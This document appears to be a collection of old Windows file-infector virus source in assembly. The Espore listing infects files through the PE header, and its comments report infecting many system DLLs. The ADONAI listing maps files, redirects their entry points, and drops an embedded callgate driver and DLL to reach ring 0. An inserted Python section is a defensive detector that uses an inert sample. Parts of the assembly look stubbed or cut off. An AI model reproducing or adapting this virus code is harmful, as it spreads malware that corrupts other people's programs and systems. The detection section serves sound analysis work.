; THE INITIAL ESI VALUE POINTS TO A READABLE MEMORY ZONE (SEEMS TO BE A CACHE ONE
; WHERE WINDOWS LOADS THE PE HEADER, THE IMPORTANT THING IS THAT HERE U CAN FIND
;BUGS: * THE BAD THING IS THAT THE INITIAL ESI VALUE ON SOME FILES POINTS TO THE KERNEL,
; SO THAT NO FILENAME IS FOUND (THE VIRUS WILL INFECT NOTHING AND WILL RETURN TO THE HOST).
; * ANOTHER POSSIBLE BUG IS THAT 0C1000000H MAY NOT BE READ/WRITE ON ALL COMPUTERS
; (AT LEAST ON MY W95 AND W98 IT WORKS FINE, AND ON A FRIEND'S COMPUTER WITH 98 IT WORKS
; TOO)
; * AND THE MOST PAINFUL THING IS THE MASK LIMIT.... IF VERY LOW -> LESS INFECTIOUS
; IF VERY HIGH -> RISK OF READING A NON-MAPPED AREA (AS WE ARE IN RING 3 IT WILL HANG
; WINDOZE)
; ANYWAY IN MY TESTS A LOT OF FILES BECAME INFECTED, MANY OF THEM WINDOWS DLL'S
;DUMP OF INITIAL ESI VALUE OF MY COMPILED BINARY (I HAVE AN OPEN PROCESS CALLED AZPR.EXE)
;81621788 FF FF FF FF 04 00 00 00 00 00 00 00 00 00 00 00 ÿÿÿÿEOT
;81621798 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;816217A8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;816217B8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;816217C8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;816217D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;816217E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;816217F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;81621808 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;81621818 00 00 00 00 00 00 00 00 20 00 00 A0 43 3A 5C 57 C:\W
;81621828 49 4E 50 52 4F 47 5C 41 5A 50 52 5C 41 5A 50 52 INPROG\AZPR\AZPR
;81621838 2E 45 58 45 20 00 00 00 48 00 00 A0 44 00 00 00 .EXE H D
; ....
; ....
;81621E38 00 1C 00 00 00 C8 00 00 00 00 00 00 00 00 00 00 FS È
;81621E48 00 00 00 00 40 00 00 C0 2E 62 73 73 00 00 00 00 @ À.bss
;81621E58 00 50 05 00 00 00 03 00 00 50 05 00 00 00 00 00 PENQ ETX PENQ
;81621E68 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 @ À
;81621E78 2E 72 65 6C 6F 63 00 00 00 50 00 00 00 50 08 00 .reloc P PBS
;81621E88 00 00 00 00 00 E4 00 00 00 00 00 00 00 00 00 00 ä
;81621E98 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 @ À.rsrc
;81621EA8 00 A0 02 00 00 A0 08 00 00 9A 01 00 00 E4 00 00 STX BS šSOH ä
;81621EB8 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 @ À
;81621EC8 61 73 70 72 00 00 00 00 00 40 01 00 00 40 0B 00 aspr @SOH @VT
;81621ED8 00 3A 01 00 00 7E 02 00 00 00 00 00 00 00 00 00 :SOH ~STX
;81621EE8 00 00 00 00 50 08 00 C0 2E 64 61 74 61 00 00 00 PBS À.data
;81621EF8 00 10 00 00 00 80 0C 00 00 00 00 00 00 B8 03 00 DLE €FF ¸ETX
;81621F08 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 @ À
;81621F18 40 00 00 A0 00 00 00 00 E0 1C 62 81 FF FF FF FF @ àFSb ÿÿÿÿ
;81621F28 E0 13 62 81 F0 13 62 81 18 00 08 00 8F 02 00 00 àDC3b ðDC3b CAN BS STX
;81621F38 08 00 00 00 00 00 00 00 00 00 40 00 D7 2B 01 00 BS @ ×+SOH
;81621F48 30 23 62 81 5C 1F 62 81 18 00 6C 1F 62 81 08 00 0#b \USb CAN lUSb BS
;81621F58 20 00 00 A0 43 3A 5C 57 49 4E 50 52 4F 47 5C 41 C:\WINPROG\A
;81621F68 5A 50 52 5C 41 5A 50 52 2E 45 58 45 00 CC CC CC ZPR\AZPR.EXE ÌÌÌ
;81621F78 B4 03 00 A0 4E 45 01 00 00 00 00 00 00 00 8C 03 ´ETX NESOH ŒETX
; ....
.586P
PMMX ; WORF... ... JEJEJE
.MODEL FLAT
LOCALS
EXTRN ExitProcess:PROC
MIX_SIZ EQU (FILE_END - MEGAMIX)
MACROSIZE MACRO
DB MIX_SIZ/00100 mod 10 + "0"
DB MIX_SIZ/00010 mod 10 + "0"
DB MIX_SIZ/00001 mod 10 + "0"
ENDM
.DATA
DB 0
DB 'SIZE = '
MACROSIZE
.CODE
MEGAMIX:
; EAX: EIP
; ESI: BUFFER
VINT21:
DD 0BFF712B9h ; MOV ECX,048BFF71H ;-) Z0MBiE
DB 'H' ; HenKy ;P
XCHG EDI, EAX ; EDI: DELTA
MOV EDX,ESI ; EDX=ESI: CACHE BUFFER (ESPORE BUG)
MOV ESI,0C1000000H ; ESI: MY DATA BUFFER
MOV EBP,EDI ; NOW: EBP=EDI=DELTA=INT21H
AMIMELASUDA:
POPAD
PORK:
INC EDX
CMP WORD PTR [EDX],':C'
JE KAA
LOOP PORK
WARNING:
PUSH 00401000H ; ANOTHER ESPORE BUG CORRECTED :)
RET
KAA:
PUSHAD
MOV AX, 3D02h ; open
CALL [EDI]
JC AMIMELASUDA
XCHG EBX, EAX
MOV EDX,ESI
XOR ECX,ECX
MOV CH,4H
MOV AH, 3Fh ;read
CALL [EDI]
MOV EAX, [EDX+3Ch]
ADD EAX,EDX
MOV EDI,EAX
PUSH 32
POP ECX
DEPOTA:
INC EDI
CMP BYTE PTR [EDI],'B'; HEHEHEHE
JE GOSTRO
JMP DEPOTA
GOSTRO:
INC EDI
PUSH EDI
MOV ESI,EBP
REP MOVSD
MOV ESI,EDI
POP EDI
SUB EDI,EDX
XCHG DWORD PTR [EAX+28H],EDI
CMP DI,1024
JB CLOZ
ADD EDI,[EAX+34H]
XCHG DWORD PTR [ESI-MONGORE],EDI
PUSH EBP
POP EDI
XOR EAX,EAX
PUSHAD
MOV AH, 42h
CDQ
CALL [EDI]
POPAD
MOV CH,4H
MOV AH,40H ; write
CALL [EDI]
CLOZ:
MOV AH,3EH ; close
CALL [EDI]
JMP AMIMELASUDA
FILE_END:
DW 0 ;-P
PUSH 0
CALL ExitProcess
;POPOPOP DB "H:\PRUEBAS\TEST.ZZZ",0
END MEGAMIX
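An added example (this editor's Python, not code from any of the listings above): Noise, Espore, Putita and Estukista all live in the PE header rather than in a section, and they all leave the same two traces on disk: non-zero bytes in the slack between the end of the section table and the first section's raw data, and an AddressOfEntryPoint (PE+28h in the listings) that resolves to header bytes instead of to a section. Espore even uses that second trace as its own "already infected" test (EP below 1024). The inspector below measures the cavity the way Noise's zero-scan needs it (the Noise listing as printed starts its scan at PE+18h+SizeOfOptionalHeader, the beginning of the section table; the example measures from the table's end, where the free bytes actually are) and asks which section owns the entry point. It also contrasts the Align routine shared by HenZe and Adonai with a correct round-up, since that routine bumps an already aligned value by a full unit. The sample PE is constructed for the demo, is not a real program, and the "infected" variant only contains inert 0xCC filler with a redirected entry point, so no virus code is produced. It assumes PE32 (not PE32+) files.

```python
import struct
from typing import Dict, List

NOISE_VSIZE = 414   # bytes of zeroed header the Noise listing needs before it infects

def parse_pe(data: bytes) -> Dict:
    """Read the DOS/COFF/optional-header fields these listings touch (PE32 only)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec, = struct.unpack_from("<H", data, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 0x14)
    opt = e_lfanew + 0x18
    entry, = struct.unpack_from("<I", data, opt + 0x10)          # PE+28h in the listings
    image_base, = struct.unpack_from("<I", data, opt + 0x1C)     # PE+34h
    file_align, = struct.unpack_from("<I", data, opt + 0x24)     # PE+3Ch, the Align divisor
    size_of_headers, = struct.unpack_from("<I", data, opt + 0x3C)
    sec_table = opt + opt_size
    sections: List[Dict] = []
    for n in range(nsec):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, sec_table + 40 * n)
        sections.append(dict(name=name.rstrip(b"\0"), va=va, vsize=vsize, rawptr=rawptr, rawsize=rawsize))
    return dict(e_lfanew=e_lfanew, entry=entry, image_base=image_base, file_align=file_align,
                size_of_headers=size_of_headers, sec_table_end=sec_table + 40 * nsec, sections=sections)

def inspect_headers(data: bytes) -> Dict:
    """Measure the header cavity and ask where the entry point lands."""
    pe = parse_pe(data)
    first_raw = min([s["rawptr"] for s in pe["sections"] if s["rawsize"]] or [pe["size_of_headers"]])
    cav_start, cav_end = pe["sec_table_end"], min(first_raw, pe["size_of_headers"])
    slack = data[cav_start:cav_end]
    free = len(slack) - len(slack.lstrip(b"\0"))      # leading zero run, what Noise's rep scasb wants
    ep = pe["entry"]
    owner = next((s["name"] for s in pe["sections"]
                  if s["va"] <= ep < s["va"] + max(s["vsize"], s["rawsize"])), None)
    return dict(cavity=(cav_start, cav_end), free_bytes=free, noise_fits=free >= NOISE_VSIZE,
                entry_rva=ep, entry_section=owner,
                entry_in_header=ep < pe["size_of_headers"],   # EP resolves to header bytes
                espore_skips=ep < 1024)                         # Espore's "EP below 1024, leave it" test

def align_henze(x: int, a: int) -> int:
    """The Align routine in HenZe/Adonai: adds (a - x mod a) unconditionally,
    so an already aligned value is pushed up by a whole unit."""
    return x + (a - x % a)

def align_up(x: int, a: int) -> int:
    """What a linker does: round up only when not already aligned."""
    return (x + a - 1) // a * a

def build_sample_pe(entry_in_cavity: bool) -> bytes:
    """Constructed minimal PE32 for the demo, not a real program: one .text
    section at file offset 0x400, SizeOfHeaders 0x400, FileAlignment 0x200.
    With entry_in_cavity=True the header slack gets inert 0xCC filler and the
    entry point is pointed at it, which is how a header-cavity infection looks
    on disk (no virus code is produced here)."""
    e_lfanew, opt_size = 0x40, 0xE0
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    for off, val in ((0x10, 0x1000), (0x1C, 0x400000), (0x20, 0x1000), (0x24, 0x200),
                     (0x38, 0x2000), (0x3C, 0x400), (0x5C, 16)):
        struct.pack_into("<I", opt, off, val)               # EP, ImageBase, aligns, sizes, dir count
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    hdr = bytearray(dos + b"PE\0\0" + coff + opt + sec)
    hdr += bytes(0x400 - len(hdr))
    if entry_in_cavity:
        cav = e_lfanew + 0x18 + opt_size + 40              # end of the section table
        hdr[cav:cav + NOISE_VSIZE] = b"\xCC" * NOISE_VSIZE
        struct.pack_into("<I", hdr, e_lfanew + 0x28, cav)  # EP now points into the header
    return bytes(hdr) + b"\xC3" * 0x200                    # .text: a lone ret

if __name__ == "__main__":
    for label, flag in (("clean", False), ("cavity used", True)):
        print(label, inspect_headers(build_sample_pe(flag)))
```

On a real corpus the two flags separate cleanly: linker output always has an entry point owned by a section, and the header slack is zero-filled, so "entry_section is None" or a non-zero run in the cavity is worth a closer look even without a byte signature for any particular specimen.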
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ADONAI.ASM]ÄÄÄ
.586P
.MODEL FLAT
LOCALS
EXTRN ExitProcess:PROC
MACROSIZE MACRO
ENDM
.DATA
DB 0 ; ZERO :/
.CODE
MEGAMIX:
FNOP
DB 'henKy'
POP EBP
CALL DELTA
DELTA: POP EBP
MOV ECX,EBP
SUB ECX,NABLA
SUB ECX,00001000H
NEW_EIP EQU $-4
MOV DWORD PTR [EBP+BASE-DELTA],ECX
F_GPA:
MOV EBX, [EAX+3Ch]
ADD EBX, EAX
MOV EBX, [EBX+120]
ADD EBX, EAX ; BEST METHOD :P
MOV ESI, [EBX+(3*4)]
ADD ESI, EAX
MOV EDX, [EBX+(8*4)]
ADD EDX, EAX
MOV ECX, [EBX+(6*4)]
DEC ECX
FIND_GPA:
LOOP_FGPA:
LOOP FIND_GPA
XCHG EAX,EBX
LEA ESI, [EBP+APIs-DELTA]
LEA EDI, [EBP+APIaddresses-DELTA]
NPI:
LODSB
OR AL, AL
JNZ SHORT NPI
CMP [ESI], AL
JNZ GPI
LEA EAX,[EBP+DLLN-DELTA]
MOV ECX,DLL_SIZ
CALL CREADOR
CDQ
PUSH EDX
LEA EBX, [EBP+BYTES-DELTA]
PUSH EBX
PUSH DLL_SIZ
LEA EAX, [EBP+DLL-DELTA]
PUSH EAX
PUSH DWORD PTR [EBP+FileHandle-DELTA]
CALL DWORD PTR [EBP+WriteFileA-DELTA]
PUSH DWORD PTR [EBP+FileHandle-DELTA]
CALL DWORD PTR [EBP+CloseHandle-DELTA]
LEA EAX,[EBP+SYSN-DELTA]
MOV ECX,SYS_SIZ
CALL CREADOR
CDQ
PUSH EDX
LEA EBX, [EBP+BYTES-DELTA]
PUSH EBX
PUSH SYS_SIZ
LEA EAX, [EBP+SYS-DELTA]
PUSH EAX
PUSH DWORD PTR [EBP+FileHandle-DELTA]
CALL DWORD PTR [EBP+WriteFileA-DELTA]
RETURN:
LEA EAX,[EBP+DLLN-DELTA]
PUSH EAX
CALL [EBP+FreeLibraryA-DELTA]
LEA EAX,[EBP+DLLN-DELTA]
PUSH EAX
CALL DWORD PTR [EBP+DeleteFileA-DELTA]
INFECT:
LOOPER:
INC EAX
JZ WARNING
DEC EAX
OR EAX,EAX
JNZ ALLKEY
WARNING:
EXIT:
MOV EAX,12345678H
ORG $-4
OLD_EIP DD 00001000H
ADD EAX,12345678H
ORG $-4
BASE DD 00400000H
PUSH EAX
RET
ALLKEY:
INC EAX
JZ Cerrar
DEC EAX
MOV DWORD PTR [EBP+FileHandle-DELTA],EAX ; SAVE HNDL
MOV ECX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA]
CALL CreateMap ; CREATE A MAP
OR EAX,EAX
JZ Cerrar
MOV DWORD PTR [EBP+MapHandle-DELTA],EAX
MOV ECX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA]
CALL MapFile ; MEMORY PROYECTION
OR EAX,EAX
JZ Cerrar
MOV DWORD PTR [EBP+MapAddress-DELTA],EAX
MOV ESI,EAX ; GET PE HDR
MOV ESI,[EAX+3CH]
ADD ESI,EAX
CMP BYTE PTR [ESI],"P" ; IS A 'P'E ?
JNZ Cerrar
CMP BYTE PTR [ESI+MARKA],"H" ; HenKy IS HERE ?
JZ Cerrar
CALL Align
XCHG ECX,EAX
MOV DWORD PTR [EBP+NewSize-DELTA],ECX
CALL CreateMap
OR EAX,EAX
JZ Cerrar
MOV DWORD PTR [EBP+MapHandle-DELTA],EAX
MOV ECX,DWORD PTR [EBP+NewSize-DELTA]
CALL MapFile
NO_REL:
POPAD
MOV EAX,[EDI+28H]
MOV DWORD PTR [EBP+OLD_EIP-DELTA],EAX ;SAVE OLD EIP
MOV EDX,[ESI+10H]
MOV EBX,EDX
ADD EDX,[ESI+14H]
PUSH EDX
MOV EAX,EBX
ADD EAX,[ESI+0CH]
MOV DWORD PTR [EBP+NEW_EIP-DELTA],EAX
XCHG EAX,[EDI+28H] ; NEW EIP
MOV EAX,[ESI+10H]
ADD EAX,MIX_SIZ
MOV ECX,[EDI+3CH]
CALL Align
UnMapFile:
CloseMap:
Cerrar:
TOPO:
CreateMap:
CDQ
PUSH EDX
PUSH ECX
PUSH EDX
PUSH 4H
PUSH EDX
PUSH DWORD PTR [EBP+FileHandle-DELTA]
CALL DWORD PTR [EBP+CreateFileMappingA-DELTA]
RET
MapFile:
CDQ
PUSH ECX
PUSH EDX
PUSH EDX
INC EDX
INC EDX
PUSH EDX
PUSH DWORD PTR [EBP+MapHandle-DELTA]
CALL DWORD PTR [EBP+MapViewOfFile-DELTA]
RET
CREADOR:
CDQ
PUSH EDX
PUSH ECX
INC EDX
PUSH EDX
DEC EDX
PUSH EDX
PUSH EDX
PUSH 80000000h + 40000000h
PUSH EAX
CALL DWORD PTR [EBP+CreateFile-DELTA]
MOV DWORD PTR [EBP+FileHandle-DELTA],EAX
RET
Align:
PUSH EDX
CDQ
PUSH EAX
DIV ECX
POP EAX
SUB ECX,EDX
ADD EAX,ECX
POP EDX
RET
INIT_E:
CALL MY
MY:
POP EDI
SUB EDI,OFFSET MY
PUSH EBP
MOV EBP,ESP
SUB ESP,18H
PUSH ESI
CALL SEL32
DLLN DB 'callgate.dll',00h
SEL32:
CALL [EDI+LoadLibraryA]
PUSH EAX
CALL EXEC
DB '_CreateCallGate@12',00h
EXEC:
PUSH EAX
CALL [EDI+GPA]
MOV EBX,EAX
DW 05dffh
DB 0e8h
ERROR:
XOR EAX,EAX
POP ESI
MOV ESP,EBP
POP EBP
JMP RETURN
RING0:
PUSH EBP
MOV EBP,ESP
PUSHAD
MOV AX, 1000
MOV BX, 200
MOV CX, AX
MOV AL, 0b6h
OUT 43h, AL
MOV DX, 0012h
MOV AX, 34dch
DIV CX
OUT 42h, AL
MOV AL,AH
OUT 42h, AL
IN AL, 61h
MOV AH, AL
OR AL, 03h
OUT 61h, AL
l1:
MOV ECX, 9680
l2:
LOOP l2
DEC BX
JNZ l1
MOV AL, AH
OUT 61h, AL
POPAD
POP EBP
RETF 0Ch
SYSN DB 'callgate.sys',0
APIs:
DB "CreateFileA",0
DB "CloseHandle",0
DB "FindFirstFileA",0
DB "FindNextFileA",0
DB "ReadFile",0
DB "MapViewOfFile",0
DB "UnmapViewOfFile",0
DB "CreateFileMappingA",0
DB "LoadLibraryA",0
DB "FreeLibrary",0
DB "WriteFile",0
DB "DeleteFileA",0
Zero_ DB 0
GPA_95 DB 0C2H,04H,00H,57H,6AH,22H,2Bh,0D2H
GPA_NT DB 0C2H,04H,00H,55H,8Bh,4CH,24H,0CH
GPA_2KB DB 48H,03H,00H,55H,8Bh,0ECh,51H,51H
;GPA_2K DB 00FH,00H,00H,55H,8Bh,0ECh,51H,51H
DLL DB 04DH,05AH,090H,000H,003H,000H,000H,000H,004H,000H,000H,000H,0FFH,0FFH
DB 000H,000H,0B8H,000H,000H,000H,000H,000H,000H,000H,040H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,080H,000H,000H,000H,00EH,01FH,0BAH,00EH,000H,0B4H,009H,0CDH,021H,0B8H
DB 001H,04CH,0CDH,021H,054H,068H,069H,073H,020H,070H,072H,06FH,067H,072H,061H
DB 06DH,020H,063H,061H,06EH,06EH,06FH,074H,020H,062H,065H,020H,072H,075H,06EH
DB 020H,069H,06EH,020H,044H,04FH,053H,020H,06DH,06FH,064H,065H,02EH,00DH,00DH
DB 00AH,024H,000H,000H,000H,000H,000H,000H,000H,050H,045H,000H,000H,04CH,001H
DB 005H,000H,0E1H,08EH,063H,033H,000H,000H,000H,000H,000H,000H,000H,000H,0E0H
DB 000H,00EH,021H,00BH,001H,003H,000H,000H,028H,000H,000H,000H,074H,000H,000H
DB 000H,000H,000H,000H,0B0H,016H,000H,000H,000H,010H,000H,000H,000H,040H,000H
DB 000H,000H,000H,000H,010H,000H,010H,000H,000H,000H,002H,000H,000H,004H,000H
DB 000H,000H,000H,000H,000H,000H,004H,000H,000H,000H,000H,000H,000H,000H,000H
DB 0E0H,000H,000H,000H,004H,000H,000H,000H,000H,000H,000H,002H,000H,000H,000H
DB 000H,000H,010H,000H,000H,010H,000H,000H,000H,000H,010H,000H,000H,010H,000H
DB 000H,000H,000H,000H,000H,010H,000H,000H,000H,060H,040H,000H,000H,06CH,000H
DB 000H,000H,000H,0C0H,000H,000H,050H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,0D0H,000H,000H,00CH,003H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 024H,0C1H,000H,000H,0D4H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,02EH,074H,065H,078H,074H,000H,000H,000H,0CBH,027H,000H,000H,000H
DB 010H,000H,000H,000H,028H,000H,000H,000H,004H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,020H,000H,000H,060H,02EH,072H,064H
DB 061H,074H,061H,000H,000H,0CCH,000H,000H,000H,000H,040H,000H,000H,000H,002H
DB 000H,000H,000H,02CH,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,040H,000H,000H,040H,02EH,064H,061H,074H,061H,000H,000H,000H
DB 048H,065H,000H,000H,000H,050H,000H,000H,000H,010H,000H,000H,000H,02EH,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,040H,000H
DB 000H,0C0H,02EH,069H,064H,061H,074H,061H,000H,000H,08AH,005H,000H,000H,000H
DB 0C0H,000H,000H,000H,006H,000H,000H,000H,03EH,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,040H,000H,000H,0C0H,02EH,072H,065H
DB 06CH,06FH,063H,000H,000H,06CH,005H,000H,000H,000H,0D0H,000H,000H,000H,006H
DB 000H,000H,000H,044H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,040H,000H,000H,042H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,083H,0ECH,014H,056H,057H,08BH,074H,024H,028H,085H
DB 0F6H,075H,00DH,0B8H,002H,000H,000H,000H,05FH,05EH,083H,0C4H,014H,0C2H,00CH
DB 000H,08DH,044H,024H,008H,08BH,00DH,03CH,050H,000H,010H,050H,068H,030H,0A0H
DB 000H,010H,051H,0E8H,000H,003H,000H,000H,083H,0C4H,00CH,085H,0C0H,075H,00DH
DB 0B8H,001H,000H,000H,000H,05FH,05EH,083H,0C4H,014H,0C2H,00CH,000H,08DH,044H
DB 024H,00CH,033H,0C9H,08BH,054H,024H,020H,051H,089H,008H,089H,048H,004H,089H
DB 048H,008H,08BH,044H,024H,028H,08DH,04CH,024H,01CH,089H,054H,024H,010H,08DH
DB 054H,024H,010H,051H,089H,044H,024H,018H,06AH,00CH,08BH,044H,024H,014H,052H
DB 08DH,054H,024H,01CH,06AH,00CH,052H,08BH,03DH,050H,0C1H,000H,010H,068H,0C0H
DB 020H,000H,083H,050H,0FFH,0D7H,085H,0C0H,075H,027H,08BH,044H,024H,008H,050H
DB 0FFH,015H,090H,0C1H,000H,010H,08BH,00DH,03CH,050H,000H,010H,051H,0E8H,0EDH
DB 003H,000H,000H,083H,0C4H,004H,0B8H,003H,000H,000H,000H,05FH,05EH,083H,0C4H
DB 014H,0C2H,00CH,000H,066H,081H,07CH,024H,016H,000H,020H,072H,048H,08DH,044H
DB 024H,018H,06AH,000H,08DH,04CH,024H,010H,050H,08BH,044H,024H,010H,06AH,00CH
DB 051H,06AH,00CH,08DH,04CH,024H,020H,051H,068H,0C4H,020H,000H,083H,050H,0FFH
DB 0D7H,08BH,04CH,024H,008H,051H,0FFH,015H,090H,0C1H,000H,010H,08BH,00DH,03CH
DB 050H,000H,010H,051H,0E8H,09CH,003H,000H,000H,083H,0C4H,004H,0B8H,002H,000H
DB 000H,000H,05FH,05EH,083H,0C4H,014H,0C2H,00CH,000H,08BH,044H,024H,008H,050H
DB 0FFH,015H,090H,0C1H,000H,010H,066H,08BH,054H,024H,014H,033H,0C9H,066H,08BH
DB 04CH,024H,016H,066H,089H,014H,04DH,030H,060H,000H,010H,066H,089H,00EH,0A1H
DB 03CH,050H,000H,010H,050H,0E8H,05FH,003H,000H,000H,083H,0C4H,004H,033H,0C0H
DB 05FH,05EH,083H,0C4H,014H,0C2H,00CH,000H,0CCH,0CCH,083H,0ECH,014H,056H,057H
DB 066H,08BH,07CH,024H,020H,066H,081H,0FFH,000H,020H,072H,00DH,0B8H,002H,000H
DB 000H,000H,05FH,05EH,083H,0C4H,014H,0C2H,004H,000H,00FH,0B7H,0C7H,08DH,034H
DB 045H,030H,060H,000H,010H,066H,081H,03EH,0FFH,0FFH,075H,00DH,0B8H,002H,000H
DB 000H,000H,05FH,05EH,083H,0C4H,014H,0C2H,004H,000H,08DH,044H,024H,008H,08BH
DB 00DH,03CH,050H,000H,010H,050H,068H,030H,0A0H,000H,010H,051H,0E8H,09EH,001H
DB 000H,000H,083H,0C4H,00CH,085H,0C0H,075H,00DH,0B8H,001H,000H,000H,000H,05FH
DB 05EH,083H,0C4H,014H,0C2H,004H,000H,066H,08BH,016H,08DH,044H,024H,00CH,033H
DB 0C9H,051H,089H,008H,089H,048H,004H,089H,048H,008H,08DH,044H,024H,01CH,066H
DB 089H,07CH,024H,01AH,050H,066H,089H,054H,024H,01CH,06AH,00CH,08DH,04CH,024H
DB 018H,08BH,044H,024H,014H,051H,06AH,00CH,08DH,04CH,024H,020H,051H,068H,0C4H
DB 020H,000H,083H,050H,0FFH,015H,050H,0C1H,000H,010H,085H,0C0H,075H,027H,08BH
DB 044H,024H,008H,050H,0FFH,015H,090H,0C1H,000H,010H,08BH,00DH,03CH,050H,000H
DB 010H,051H,0E8H,090H,002H,000H,000H,083H,0C4H,004H,0B8H,003H,000H,000H,000H
DB 05FH,05EH,083H,0C4H,014H,0C2H,004H,000H,066H,0C7H,006H,0FFH,0FFH,08BH,044H
DB 024H,008H,050H,0FFH,015H,090H,0C1H,000H,010H,08BH,00DH,03CH,050H,000H,010H
DB 051H,0E8H,064H,002H,000H,000H,083H,0C4H,004H,033H,0C0H,05FH,05EH,083H,0C4H
DB 014H,0C2H,004H,000H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,08BH,044H,024H,008H
DB 056H,057H,085H,0C0H,074H,00FH,083H,0F8H,001H,074H,034H,0B8H,001H,000H,000H
DB 000H,05FH,05EH,0C2H,00CH,000H,033H,0F6H,0BFH,0FFH,0FFH,000H,000H,066H,039H
